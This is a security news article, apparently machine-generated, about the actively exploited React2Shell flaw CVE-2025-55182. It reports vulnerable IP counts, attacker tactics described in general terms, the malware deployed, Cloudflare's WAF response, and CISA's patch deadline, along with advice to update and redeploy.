Ethical Hacking News
A critical React2Shell remote code execution flaw (CVE-2025-55182) has exposed over 77k IP addresses to potential breaches across multiple sectors, with attackers already compromising more than 30 organizations worldwide. To mitigate the damage, developers must update React immediately and rebuild their applications.
The React2Shell flaw is a critical remote code execution vulnerability (CVE-2025-55182) that has been actively exploited by attackers, resulting in breaches of over 30 organizations worldwide.The vulnerability was discovered by security researcher Maple3142 and allows attackers to execute arbitrary commands remotely through unsafe deserialization of client-controlled data inside React Server Components.A total of 77,664 IP addresses have been identified as vulnerable to the React2Shell flaw, with around 23,700 in the United States alone.Attackers have used tactics such as executing PowerShell commands and deploying payloads to gain access to systems, including installing Cobalt Strike beacons and Snowlight malware.Organizations are strongly advised to update their systems immediately and rebuild/redeploy their applications due to the severity of the vulnerability.CISA has added the CVE-2025-55182 flaw to its Known Exploited Vulnerabilities (KEV) catalog, requiring federal agencies to apply patches by December 26th.
The React2Shell flaw, a critical remote code execution vulnerability (CVE-2025-55182), has been actively exploited by attackers resulting in breaches of over 30 organizations worldwide. According to recent reports, the vulnerability was initially disclosed on December 3rd by the React team and it's known that unsafe deserialization of client-controlled data inside React Server Components enables attackers to execute arbitrary commands remotely.
The React2Shell flaw is particularly concerning due to its potential impact on frameworks like Next.js, which implements the same deserialization logic. The vulnerability was discovered by security researcher Maple3142 who published a working proof-of-concept demonstrating remote command execution against unpatched servers. Since then, automated tools have been used to exploit this flaw with ease.
A total of 77,664 IP addresses have now been identified as vulnerable to the React2Shell flaw, according to Shadowserver Internet watchdog group reports. Among these, around 23,700 are located in the United States alone, while over 30 organizations across multiple sectors have already been compromised by attackers exploiting this vulnerability.
Attackers have used various tactics such as executing PowerShell commands that perform basic math functions to confirm if a device is vulnerable to the remote code execution flaw. If confirmed, they execute base64-encoded PowerShell scripts directly into memory which download additional scripts and deploy payloads to further gain access to systems.
Researchers at GreyNoise observed attacks where threat actors were seen using these tactics to install a Cobalt Strike beacon on compromised devices, thus providing them with a foothold on the network. The malware deployed in these attacks includes Snowlight, a dropper that allows attackers to drop additional payloads, and Vshell, a backdoor commonly used by Chinese hacking groups for remote access and lateral movement within compromised networks.
Due to its severity, numerous companies have rushed to patch their systems and apply mitigations to protect against this critical vulnerability. Yesterday, Cloudflare rolled out emergency detections and rules for the React flaw in its Web Application Firewall (WAF) but inadvertently caused an outage affecting numerous websites before correcting the issues.
As a result of the widespread exploitation of the CVE-2025-55182 flaw, organizations utilizing React Server Components or frameworks built on top of it are strongly advised to update their systems immediately and rebuild/redeploy their applications. It is also essential for them to review logs to detect signs of PowerShell or shell command execution that could indicate potential breaches.
CISA has added the CVE-2025-55182 flaw to its Known Exploited Vulnerabilities (KEV) catalog, requiring federal agencies to apply patches by December 26th under Binding Operational Directive 22-01. Organizations must therefore prioritize patching their systems and taking necessary security measures to protect against potential attacks.
The researchers observed that IP addresses were vulnerable using a detection technique where an HTTP request was sent to servers to exploit the flaw, and a specific response was checked to confirm if a device was vulnerable. GreyNoise also recorded over 181 distinct IP addresses attempting to exploit this vulnerability within the past 24 hours, with most of them appearing automated in nature.
These scans were primarily originating from countries including China, Hong Kong, the Netherlands, and several other nations. The rush to patch has been underscored by organizations seeking proactive measures against this critical vulnerability.
Related Information:
https://www.ethicalhackingnews.com/articles/React2Shell-Flaw-A-Critical-Vulnerability-Exposed-to-Breaches-of-30-Orgs-and-77k-IP-Addresses-ehn.shtml
https://www.bleepingcomputer.com/news/security/react2shell-flaw-exploited-to-breach-30-orgs-77k-ip-addresses-vulnerable/
https://nvd.nist.gov/vuln/detail/CVE-2025-55182
https://www.cvedetails.com/cve/CVE-2025-55182/
https://blog.talosintelligence.com/chinese-hacking-group-apt41-compromised-taiwanese-government-affiliated-research-institute-with-shadowpad-and-cobaltstrike-2/
https://www.reddit.com/r/AskIreland/comments/15lur9e/email_scam_what_is_an_apt_hacking_group/
https://www.shadowserver.org/who-we-are/media-coverage/
https://www.socinvestigation.com/comprehensive-list-of-apt-threat-groups-motives-and-attack-methods/
Published: Sat Dec 6 13:19:13 2025 by llama3.2 3B Q4_K_M
